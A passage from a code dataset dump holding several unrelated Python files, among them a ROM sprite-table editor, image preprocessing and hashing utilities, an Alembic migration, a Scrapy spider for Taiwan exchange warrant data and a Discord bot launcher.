\"+HEX(frames_ptrs))\r\n print(\"root: Frames Address: \"+HEX(frames_addr))\r\n # Create the Table Object\r\n ptr_tbl_obj = OWPointerTable(table_ptr_addr, table_addr,\r\n ow_data_addr, frames_ptrs, frames_addr)\r\n self.tables_list.append(ptr_tbl_obj)\r\n\r\n print(\"\\nroot: About to check: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n print(\"\\nroot: Not a ptr: {} ({})\".format(HEX(addr), HEX(ptr_to_addr(addr))))\r\n\r\n def reload(self):\r\n self.tables_list = []\r\n self.ow_tables_addr = TBL_0\r\n\r\n # Get addresses of OW Data Pointers Tables (Table 1)\r\n addr = self.ow_tables_addr\r\n ow_tbls_addrs = [] #[ptr:Table 1] or Table 0's entries\r\n while is_table_ptr(addr):\r\n ow_tbls_addrs.append(addr)\r\n self.ow_tables_addrs.append(ptr_to_addr(addr))\r\n addr += 4\r\n\r\n for addr in ow_tbls_addrs:\r\n table_ptr_addr = addr\r\n table_addr = ptr_to_addr(addr)\r\n end_of_table = table_addr + (256 * 4)\r\n ow_data_addr = ptr_to_addr(end_of_table)\r\n frames_ptrs = ptr_to_addr(end_of_table + 4)\r\n frames_addr = ptr_to_addr(end_of_table + 8)\r\n SHOW(\"Loading Table (\"+HEX(table_addr)+\")\")\r\n\r\n # Create the Table Object\r\n ptr_tbl_obj = OWPointerTable(table_ptr_addr, table_addr,\r\n ow_data_addr, frames_ptrs, frames_addr)\r\n self.tables_list.append(ptr_tbl_obj)\r\n\r\n def custom_table_import(self, new_table, ow_data_addr, frames_ptrs, frames_addr):\r\n self.import_OW_Table(*addrs_filter(new_table, ow_data_addr, frames_ptrs, frames_addr))\r\n\r\n def clear_OW_Tables(self, ow_table_addr=TBL_0):\r\n # Clear all the table entries after the original OW Table\r\n ow_table_addr += 4\r\n for i in range(ow_table_addr, ow_table_addr + 25):\r\n rom.seek(i)\r\n rom.write_byte(0)\r\n # Clear all the entries in the tables_list\r\n # by re-initializing\r\n self.tables_list = []\r\n self.__init__()\r\n\r\n def import_OW_Table(self, new_table, ow_data_addr, frames_ptrs, frames_addr, ):\r\n # Imports a new OW Table\r\n write_addr = self.ow_tables_addr\r\n # Find ptr addr to write\r\n while is_table_ptr(write_addr):\r\n write_addr += 4\r\n\r\n write_ptr(new_table, write_addr)\r\n self.tables_list.append(OWPointerTable(write_addr, *addrs_filter(\r\n new_table, ow_data_addr, frames_ptrs, frames_addr)))\r\n\r\n def remove_table(self, i):\r\n tbl = self.tables_list[i]\r\n for ow in tbl.ow_data_ptrs:\r\n ow.remove()\r\n\r\n # Clear all of the godam data\r\n fill_with_data(tbl.frames_ptrs_addr, 256 * 8 * FRAMES_PER_OW, 0xFF)\r\n fill_with_data(tbl.ow_data_addr, 256 * 36, 0xFF)\r\n fill_with_data(tbl.table_addr, 259 * 4, 0xFF)\r\n\r\n # Move all the table ptrs to the left\r\n addr = self.ow_tables_addr + (i * 4)\r\n print(\"remove_table: about to remove: \"+HEX(addr))\r\n fill_with_data(addr, 4, 0)\r\n\r\n addr += 4\r\n while is_table_ptr(addr):\r\n print(\"remove_table: Moving left ptr: \"+HEX(addr))\r\n move_data(addr, addr - 4, 4, 0)\r\n addr += 4\r\n\r\n # Re-initialise the entire root\r\n self.reload()\r\n\r\n def tables_num(self):\r\n return len(self.tables_list)\r\n\r\n def repoint_table(self, table_ptrs_addr):\r\n # Find number of OWs\r\n SHOW(\"Determining number of OWs for Table: \"+HEX(table_ptrs_addr))\r\n ow_ptrs_addr = ptr_to_addr(table_ptrs_addr)\r\n ows_num = 0\r\n addr = ow_ptrs_addr\r\n while is_ow_data_ptr(addr) and ows_num <= 256:\r\n # Don't continue if OW is part of another Table\r\n if ows_num > 1 and addr in self.ow_tables_addrs:\r\n break\r\n ows_num += 1\r\n addr += 4\r\n print(\"Found OWs: {} | Not OW Pointer: {} | Pointing to: {}\".format(\\\r\n ows_num, HEX(addr), 
HEX(ptr_to_addr(addr))))\r\n\r\n # Create the new table and fix the previous ptrs\r\n SHOW(\"Searching Free Space for the New Table\")\r\n repointed_table = OWPointerTable(TBL_0, *addrs_filter(0, 0, 0, 0))\r\n write_ptr(repointed_table.table_addr, table_ptrs_addr)\r\n self.tables_list.append(repointed_table)\r\n\r\n # Find the Frames Pointers for each OW\r\n original_frames_ptrs = []\r\n for ow_ptr in range(ow_ptrs_addr, ow_ptrs_addr + (4 * ows_num), 4):\r\n data_ptr = ptr_to_addr(ow_ptr)\r\n original_frames_ptrs.append(ptr_to_addr(data_ptr + 0x1C))\r\n FRAMES_PTRS_PTRS.add(ptr_to_addr(data_ptr + 0x1C))\r\n\r\n # Create a list with the num of frames for each OW\r\n frames = []\r\n for ow in range(ows_num):\r\n check_addr = original_frames_ptrs[ow] + 8\r\n frames_num = 1\r\n\r\n # Check if current has different palette with the next one\r\n basic_cond = (check_addr not in FRAMES_PTRS_PTRS) and is_frames_ptr(check_addr)\r\n size_cond = read_word(check_addr + 0x4) == read_word(check_addr - 0x8 + 0x4)\r\n\r\n while basic_cond and size_cond:\r\n frames_num += 1\r\n check_addr += 8\r\n basic_cond = (check_addr not in original_frames_ptrs) and is_frames_ptr(check_addr)\r\n size_cond = read_word(check_addr + 0x4) == read_word(check_addr - 0x8 + 0x4)\r\n\r\n frames.append(frames_num)\r\n\r\n # Find the Type of each OW\r\n types = []\r\n for frames_ptrs_addr in original_frames_ptrs:\r\n FramesAssistant = FramesPointers(frames_ptrs_addr)\r\n types.append(FramesAssistant.get_type())\r\n\r\n # Restore the Data\r\n for i in range(0, ows_num):\r\n # print(\"root: Adding OW: \" + str(i))\r\n # print(\"root: Frames: \" + str(frames[i]))\r\n # print(\"OW Data Pointer: \"+HEX(ow_ptrs_addr+4*i))\r\n # print(\"Type: \"+str(types[i]))\r\n SHOW(\"Repoining OW {}\".format(i))\r\n # ow_addr = ow_ptrs_addr + i*4\r\n # data_addr = ptr_to_addr(ow_addr)\r\n # print(\"Repointing OW \"+str(i))\r\n # print(\"Data Addr: \"+HEX(data_addr))\r\n repointed_table.add_ow(types[i], frames[i])\r\n new_frames_ptr = read_word(repointed_table.ow_data_ptrs[-1].ow_data_addr + 0x1C)\r\n copy_data(ptr_to_addr(ow_ptrs_addr + i * 4),\r\n repointed_table.ow_data_ptrs[-1].ow_data_addr,\r\n 0x24)\r\n write_word(repointed_table.ow_data_ptrs[-1].ow_data_addr + 0x1C, new_frames_ptr)\r\n\r\n # Copy the actual frames\r\n for j in range(frames[i]):\r\n copy_data(ptr_to_addr(original_frames_ptrs[i] + (j * 8)),\r\n repointed_table.ow_data_ptrs[-1].frames.frames_addr + (j * get_frame_size(types[i])),\r\n get_frame_size(types[i]))\r\n\r\n if len(frames) >= 218:\r\n SHOW(\"Paddding the extra OWs\")\r\n for i in range(0, 256 - len(frames)):\r\n repointed_table.add_ow(1, 9)\r\n\r\n # Clean the data of the original table\r\n SHOW(\"Cleaning up...\")\r\n i = 0\r\n for ow_ptr in range(ow_ptrs_addr, ow_ptrs_addr + (4 * ows_num), 4):\r\n\r\n data_ptr = ptr_to_addr(ow_ptr)\r\n fill_with_data(ow_ptr, 4, 0xFF)\r\n\r\n ow_frames_ptrs = ptr_to_addr(data_ptr + 28)\r\n fill_with_data(data_ptr, 36, 0xFF)\r\n\r\n for k in range(0, frames[i]):\r\n if ow_frames_ptrs != 0xFFFFFF:\r\n if is_frames_ptr(ow_frames_ptrs) == 1:\r\n frame_addr = ptr_to_addr(ow_frames_ptrs)\r\n fill_with_data(frame_addr, get_frame_size(types[i]), 0xFF)\r\n\r\n fill_with_data(ow_frames_ptrs, 8, 0xFF)\r\n ow_frames_ptrs += 8\r\n\r\n i += 1\r\n\r\n def get_num_of_available_table_ptrs(self):\r\n\r\n check_addr = self.ow_tables_addr\r\n\r\n while is_ptr(check_addr) == 1:\r\n check_addr += 4\r\n\r\n i = 0\r\n done = 0\r\n while done == 0:\r\n adder = 0\r\n rom.seek(check_addr)\r\n for j in range(0, 
4):\r\n adder += rom.read_byte()\r\n\r\n if adder != 0:\r\n done = 1\r\n else:\r\n check_addr += 4\r\n i += 1\r\n return i\r\n","sub_path":"core_files/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":32728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"271377534","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 27 17:52:30 2018\r\n\r\n@author: Pierre Lavigne\r\n\"\"\"\r\n\r\n#%%\r\n\r\nimport csv\r\nfrom skimage.transform import resize\r\nfrom skimage import exposure\r\nfrom skimage.transform import rotate\r\nfrom skimage.transform import warp\r\nfrom skimage.transform import ProjectiveTransform\r\nimport pickle\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\ndef readTrafficSigns(rootpath):\r\n '''Reads traffic sign data for German Traffic Sign Recognition Benchmark.\r\n Arguments: path to the traffic sign data, for example './GTSRB/Training'\r\n Returns: list of images, list of corresponding labels'''\r\n images = [] # images\r\n labels = [] # corresponding labels\r\n # loop over all 42 classes\r\n for c in range(0,43):\r\n prefix = rootpath + '/' + format(c, '05d') + '/' # subdirectory for class\r\n gtFile = open(prefix + 'GT-'+ format(c, '05d') + '.csv') # annotations file\r\n gtReader = csv.reader(gtFile, delimiter=';') # csv parser for annotations file\r\n next(gtReader) # skip header\r\n # loop over all images in current annotations file\r\n for row in gtReader:\r\n images.append(plt.imread(prefix + row[0])) # the 1th column is the filename\r\n labels.append(row[7]) # the 8th column is the label\r\n gtFile.close()\r\n return(images, labels)\r\n\r\n\r\ndef resize_sign(image, new_dim):\r\n return(resize(image, new_dim, mode='constant'))\r\n\r\ndef load_pickled_data(file, columns):\r\n with open(file, mode='rb') as f:\r\n dataset = pickle.load(f)\r\n return tuple(map(lambda c: dataset[c], columns))\r\n\r\ndef preprocess_dataset(X):\r\n #Convert to grayscale, e.g. 
single Y channel\r\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\r\n #Scale features to be in [0, 1]\r\n X = (X / 255.).astype(np.float32)\r\n\r\n # Add a single grayscale channel\r\n X = X.reshape(X.shape + (1,)) \r\n return X\r\n\r\ndef flip_extend(X, y):\r\n # Classes of signs that, when flipped horizontally, should still be classified as the same class\r\n self_flippable_horizontally = np.array([11, 12, 13, 15, 17, 18, 22, 26, 30, 35])\r\n # Classes of signs that, when flipped vertically, should still be classified as the same class\r\n self_flippable_vertically = np.array([1, 5, 12, 15, 17])\r\n # Classes of signs that, when flipped horizontally and then vertically, should still be classified as the same class\r\n self_flippable_both = np.array([32, 40])\r\n # Classes of signs that, when flipped horizontally, would still be meaningful, but should be classified as some other class\r\n cross_flippable = np.array([\r\n [19, 20], \r\n [33, 34], \r\n [36, 37], \r\n [38, 39],\r\n [20, 19], \r\n [34, 33], \r\n [37, 36], \r\n [39, 38], \r\n ])\r\n num_classes = 43\r\n \r\n X_extended = np.empty([0, X.shape[1], X.shape[2], X.shape[3]], dtype = X.dtype)\r\n y_extended = np.empty([0], dtype = y.dtype)\r\n \r\n for c in range(num_classes):\r\n # First copy existing data for this class\r\n X_extended = np.append(X_extended, X[y == c], axis = 0)\r\n # If we can flip images of this class horizontally and they would still belong to said class...\r\n if c in self_flippable_horizontally:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X[y == c][:, :, ::-1, :], axis = 0)\r\n # If we can flip images of this class horizontally and they would belong to other class...\r\n if c in cross_flippable[:, 0]:\r\n # ...Copy flipped images of that other class to the extended array.\r\n flip_class = cross_flippable[cross_flippable[:, 0] == c][0][1]\r\n X_extended = np.append(X_extended, X[y == flip_class][:, :, ::-1, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n # If we can flip images of this class vertically and they would still belong to said class...\r\n if c in self_flippable_vertically:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X_extended[y_extended == c][:, ::-1, :, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n # If we can flip images of this class horizontally AND vertically and they would still belong to said class...\r\n if c in self_flippable_both:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X_extended[y_extended == c][:, ::-1, ::-1, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n return (X_extended, y_extended)\r\n\r\ndef preprocess_dataset_new(X):\r\n #Convert to grayscale, e.g. 
single Y channel\r\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\r\n #Scale features to be in [0, 1]\r\n X = (X / 255.).astype(np.float32)\r\n \r\n # Apply localized histogram localization \r\n for i in range(X.shape[0]):\r\n X[i] = exposure.equalize_adapthist(X[i])\r\n X = X.reshape(X.shape + (1,)) \r\n return X\r\n\r\n\r\ndef increase_data(images,nb_int,labels=None):\r\n image_size = images[0].shape[0]\r\n data_size = images.shape[0]\r\n for i in range(data_size):\r\n for j in range(nb_int):\r\n delta = random.uniform(-20,20) # scale using augmentation intensity\r\n d = random.uniform(-10,10)\r\n tl_top = random.uniform(-d, d) # Top left corner, top margin\r\n tl_left = random.uniform(-d, d) # Top left corner, left margin\r\n bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin\r\n bl_left = random.uniform(-d, d) # Bottom left corner, left margin\r\n tr_top = random.uniform(-d, d) # Top right corner, top margin\r\n tr_right = random.uniform(-d, d) # Top right corner, right margin\r\n br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin\r\n br_right = random.uniform(-d, d) # Bottom right corner, right margin\r\n transform = ProjectiveTransform()\r\n transform.estimate(np.array(((tl_left, tl_top),(bl_left, image_size - bl_bottom),(image_size - br_right, image_size - br_bottom),\r\n (image_size - tr_right, tr_top))), np.array(((0, 0),(0, image_size),(image_size, image_size),(image_size, 0))))\r\n \r\n images = np.append(images,[warp(images[i],transform,output_shape = (32,32),order = 1, mode='edge')],axis = 0)\r\n images = np.append(images,[rotate(images[i], random.uniform(-delta, delta), mode = 'edge')],axis=0)\r\n if labels is None:\r\n pass\r\n else:\r\n #labels = np.append(labels,labels[i])\r\n labels = np.append(labels,labels[i])\r\n if i%100 == 0:\r\n print(i/data_size*100,'% de progression')\r\n return(images,labels)\r\n\r\ndef sqr_noise(img,x,y,nb_sqr):\r\n im = []\r\n for k in range(len(img)):\r\n img2 = img[k].copy()\r\n randomsqrx = np.random.randint(x[0] ,x[1] ,nb_sqr)\r\n randomsqry = np.random.randint(y[0] ,y[1] ,nb_sqr)\r\n randomsqr = [randomsqrx,randomsqry] \r\n for (i,j) in zip(randomsqr[0],randomsqr[1]) :\r\n size = np.random.randint(2,8,2)\r\n if (np.random.randint(0,10)<5):\r\n img2[i-size[0]+5:i+5,j+5-size[1]:j+5,:] = np.zeros(size[0]*size[1]*3).reshape(size[0],size[1],3)\r\n else:\r\n img2[i+5-size[0]:i+5,j+5-size[1]:j+5,:] = np.zeros(size[0]*size[1]*3).reshape(size[0],size[1],3) + 255\r\n im.append(img2)\r\n return np.array(im)\r\n\r\n\r\n","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174623409","text":"\"\"\"empty message\n\nRevision ID: 1e730a1b145\nRevises: 18d5afb529a\nCreate Date: 2015-12-21 15:53:38.211599\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1e730a1b145'\ndown_revision = '18d5afb529a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('team',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('created_by_id', sa.Integer(), nullable=True),\n sa.Column('private', sa.Boolean(), nullable=True),\n sa.Column('avatar_url', sa.String(length=100), nullable=True),\n sa.Column('website', sa.String(length=200), nullable=True),\n sa.Column('last_updated', sa.DateTime(), nullable=True),\n sa.Column('location', sa.String(length=120), nullable=True),\n sa.Column('description', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['created_by_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_team_name'), 'team', ['name'], unique=True)\n op.create_table('projects_teams',\n sa.Column('project_id', sa.Integer(), nullable=False),\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('project_id', 'team_id')\n )\n op.create_table('team_groups',\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.Column('group_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['group_id'], ['group.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('team_id', 'group_id')\n )\n op.create_table('team_member',\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.Column('member_id', sa.Integer(), nullable=False),\n sa.Column('status', sa.String(length=50), nullable=False),\n sa.ForeignKeyConstraint(['member_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('team_id', 'member_id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('team_member')\n op.drop_table('team_groups')\n op.drop_table('projects_teams')\n op.drop_index(op.f('ix_team_name'), table_name='team')\n op.drop_table('team')\n ### end Alembic commands ###\n","sub_path":"hubserver/migrations/versions/1e730a1b145_.py","file_name":"1e730a1b145_.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111094711","text":"import cv2 as cv\nimport numpy as np\n\n# 均值哈希算法\ndef ahash(img):\n # 将图片缩放成8*8\n img = cv.resize(img, (8, 8), interpolation=cv.INTER_CUBIC)\n # 将图片转换为灰度图\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # x为像素的最初值,\n x = 0\n # hash_str的最初值为‘’\n hash_str = ''\n # 遍历累加求像素和\n for i in range(8):\n for j in range(8):\n x = x + gray[i, j]\n # 求平均速度\n avy = x / 64\n # 灰度值大于平均值就为1,小于就为0\n for i in range(8):\n for j in range(8):\n if gray[i, j] > avy:\n hash_str = hash_str + '1'\n else:\n hash_str = hash_str + '0'\n return hash_str\n\n# 差值感知算法\ndef dhash(img):\n # 将图片缩放成8*9\n img = cv.resize(img, (9, 8), interpolation=cv.INTER_CUBIC)\n # 将图片转换成灰度图\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n hash_str = ''\n # 每行前一个像素大于后一个像素就为1, 反之就为0\n for i in range(8):\n for j in range(8):\n if gray[i, j] > gray[i, j + 1]:\n hash_str = hash_str + '1'\n else:\n hash_str = hash_str + '0'\n return hash_str\n\n# 哈希值对比\ndef cmphash(hash1, hash2):\n n = 0\n # 哈希长度不一样就返回-1,表示参数出错\n if len(hash1) != len(hash2):\n return -1\n # 遍历判断\n for i in range(len(hash1)):\n # 不相等则n计数加1,n为最终的相似度\n if hash1[i] != hash2[i]:\n n = n+1\n return n\n\nimg1 = cv.imread('C:/Users/AI/Pictures/Saved Pictures/A/20210222_080517.jpg')\nimg2 = cv.imread('C:/Users/AI/Pictures/Saved Pictures/A/20210222_080653.jpg')\nhash1 = ahash(img1)\nhash2 = ahash(img2)\nprint(hash1)\nprint(hash2)\nn = cmphash(hash1, hash2)\nprint('均值哈希算法的相似度:', n)\nhash1 = dhash(img1)\nhash2 = dhash(img2)\nprint(hash1)\nprint(hash2)\nn = cmphash(hash1, hash2)\nprint('插值算法的相似度:', n)\n","sub_path":"Homework/76+彭长江+四川/哈希算法.py","file_name":"哈希算法.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111251555","text":"import argparse\n\nimport discord\nimport asyncio\n\nimport settings\nimport traceback\n\nfrom fortitude_bot import FortitudeBot\n\nclient = discord.Client()\nbot = FortitudeBot(client)\n\n\n@client.event\nasync def on_ready():\n settings.logger.info('logged in as {} '.format(client.user.name, client.user.id))\n\n\n@client.event\nasync def on_member_join(member):\n try:\n await bot._event_on_member_join(member)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\n@client.event\nasync def on_message_edit(before, after):\n try:\n await bot._event_on_message(after)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\n@client.event\nasync def on_message(context):\n try:\n await bot._event_on_message(context)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\ndef main():\n\n loop = asyncio.get_event_loop()\n\n try:\n token = open('token.txt', 'r').read()\n loop.run_until_complete(client.login(token))\n loop.run_until_complete(client.connect())\n except Exception:\n settings.logger.warning(traceback.format_exc())\n finally:\n settings.logger.info(\"disconnected\")\n loop.run_until_complete(client.close())\n loop.close()\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"253339207","text":"\n# palindrome permutation\n\n# given a string\n# is a permutation of the stirng a palindrome?\n\n# tact coa\n# return true because it can be\n# tacocat or atcocta\n\n\ndef palindrome_permutation(string):\n string = string.replace(\" \", \"\")\n string = list(string)\n print(string)\n res = False\n res = recurse(res, string, 0)\n return res\n\n\ndef recurse(res, string, i):\n if i == len(string) - 1:\n temp = ''.join(string)\n print(temp == temp[::-1])\n if temp == temp[::-1]:\n res = True\n return res\n else:\n for j in range(i, len(string)):\n swap(i, j, string)\n res = recurse(res, string, i + 1)\n swap(i, j, string)\n return res\n\ndef swap(i, j, string):\n string[i], string[j] = string[j], string[i]\n\n\nprint(palindrome_permutation(\"tact coa\"))\n","sub_path":"ctci/array_strings/palindrome_permutation.py","file_name":"palindrome_permutation.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213633616","text":"#!/usr/bin/env cctbx.python\n\nfrom cctbx.french_wilson import fw_centric,fw_acentric\nimport pandas as pd\nimport numpy as np\n\noutFN = \"fw_test_data.csv\"\n\nImin,Imax,Istep = -3, 10, 1.0\nSigImin,SigImax,SigIstep = 0.1, 10, 1.0\nSigmamin,Sigmamax,Sigmastep = 0.1, 10., 1.0\n\nI,SigI,Sigma = np.mgrid[Imin:Imax:Istep,SigImin:SigImax:SigIstep,Sigmamin:Sigmamax:Sigmastep].reshape((3, -1))\n\ndata = []\nfor args in zip(I, SigI, Sigma):\n i,sigi,sigma = args\n result = fw_acentric(i, sigi, sigma, -4.)\n if result != (-1., -1., -1., -1.): #These were rejected\n data.append(args + result)\n\ndata = np.vstack(data)\ndf = pd.DataFrame(data = data, columns=('I', 'SigI', 'Sigma', 'FW-I', 'FW-SigI', 'FW-F', 'FW-SigF'))\ndf['CENTRIC'] = False\n\ndata = []\nfor args in zip(I, SigI, Sigma):\n i,sigi,sigma = args\n result = fw_centric(i, sigi, sigma, -4.)\n if result != (-1., -1., -1., -1.): #These were rejected\n data.append(args + result)\n\ndata = np.vstack(data)\n_df = pd.DataFrame(data = data, columns=('I', 'SigI', 'Sigma', 'FW-I', 'FW-SigI', 'FW-F', 'FW-SigF'))\n_df['CENTRIC'] = True\ndf = df.append(_df)\n\ndf.to_csv(outFN, index=False)\n\n","sub_path":"tests/data/french_wilson/gen_fw_reference_data.py","file_name":"gen_fw_reference_data.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27770369","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport typing as tp\nfrom . import core\nfrom . import container\nfrom . import choice\n\n\ndef flatten_parameter(\n parameter: core.Parameter,\n with_containers: bool = True,\n order: int = 0\n) -> tp.Dict[str, core.Parameter]:\n \"\"\"List all the instances involved as parameter (not as subparameter/\n endogeneous parameter)\n\n Parameter\n ---------\n parameter: Parameter\n the parameter to inspect\n with_container: bool\n returns only non-container instances (aka no Dict, Tuple, Instrumentation or Constant)\n order: int\n order of model/internal parameters to extract. 
With 0, no model/internal parameters is\n extracted, with 1, only 1st order are extracted, with 2, so model/internal parameters and\n their own model/internal parameters etc...\n\n Returns\n -------\n dict\n a dict of all parameters implied in this parameter, i.e all choices, items of dict\n and tuples etc, but not the subparameters/endogeneous parameters like sigma\n with keys if type \".\" for a tuple containing dicts containing data for instance.\n\n Note\n ----\n This function is experimental, its output will probably evolve before converging.\n \"\"\"\n flat = {\"\": parameter}\n if isinstance(parameter, core.Dict):\n content_to_add: tp.List[core.Dict] = [parameter]\n if isinstance(parameter, container.Instrumentation): # special case: skip internal Tuple and Dict\n content_to_add = [parameter[0], parameter[1]] # type: ignore\n for c in content_to_add:\n for k, p in c._content.items():\n content = flatten_parameter(p, with_containers=with_containers, order=order)\n flat.update({str(k) + (\"\" if not x else (\".\" if not x.startswith(\"#\") else \"\") + x): y for x, y in content.items()})\n if order > 0 and parameter._parameters is not None:\n subparams = flatten_parameter(parameter.parameters, with_containers=False, order=order - 1)\n flat.update({\"#\" + str(x): y for x, y in subparams.items()})\n if not with_containers:\n flat = {x: y for x, y in flat.items() if not isinstance(y, (core.Dict, core.Constant)) or isinstance(y, choice.BaseChoice)}\n return flat\n","sub_path":"nevergrad/parametrization/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305969182","text":"import http.client\nimport json\n\n\ndef parse_events_from_http(stream):\n conn = http.client.HTTPSConnection(\"playing-with-projections.herokuapp.com\")\n conn.request(\"GET\", \"/stream/\" + stream)\n\n data = conn.getresponse().read().decode(\"utf-8\")\n\n events = json.loads(data)\n return events\n\ndef parse_events_from_file(stream):\n with open(\"../data/\" + stream + \".json\") as json_file:\n events = json.load(json_file)\n\n return events\n\n\nevents = parse_events_from_file(\"2\")\nall_types = [e[\"type\"] for e in events]\nprint(all_types)\n","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621651094","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport scrapy\nfrom scrapy import Selector\nfrom scrapy.loader import ItemLoader\nfrom itemloaders.processors import MapCompose, TakeFirst\nfrom exchanges.twse.items import WarrantInfoItem\n\n\nclass WarrantInfoSpider(scrapy.Spider):\n name = 'twse_warrant_info'\n allowed_domains = ['isin.twse.com.tw']\n date = datetime.date.today().strftime(\"%Y%m%d\")\n\n def start_requests(self):\n self.logger.info(f'Parsing date: {self.date}')\n yield scrapy.FormRequest(url='https://mops.twse.com.tw/mops/web/ajax_t90sbfa01', formdata={\n 'encodeURIComponent': '1', 'step': '1', 'ver': '1.9', 'TYPEK': '', 'market': '1',\n 'wrn_class': 'all', 'stock_no': '', 'wrn_no': '', 'co_id': 'all', 'wrn_type': 'all',\n 'left_month': 'all', 'return_rate': 'all', 'price_down': '', 'price_up': '',\n 'price_inout': 'all', 'newprice_down': '', 'newprice_up': '', 'fin_down': '', 'fin_up': '', 'sort': '1'\n }, callback=self.parse)\n\n def parse(self, response):\n self.logger.info('%s', response.url)\n fields = 
WarrantInfoItem.Meta.fields\n rows = response.xpath('//tr[count(td)=21]').extract()\n for row in rows:\n loader = ItemLoader(item=WarrantInfoItem(), selector=Selector(text=row))\n loader.default_input_processor = MapCompose(str, str.strip)\n loader.default_output_processor = TakeFirst()\n loader.add_value('date', self.date)\n for idx, field in enumerate(fields, start=1):\n if field:\n loader.add_xpath(field, f'//td[{idx}]/text()')\n yield loader.load_item()\n","sub_path":"exchanges/twse/spiders/warrant/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"472397983","text":"# MIT License\n# \n# Copyright (c) 2020-2021 Pierre-Yves Taunay \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR 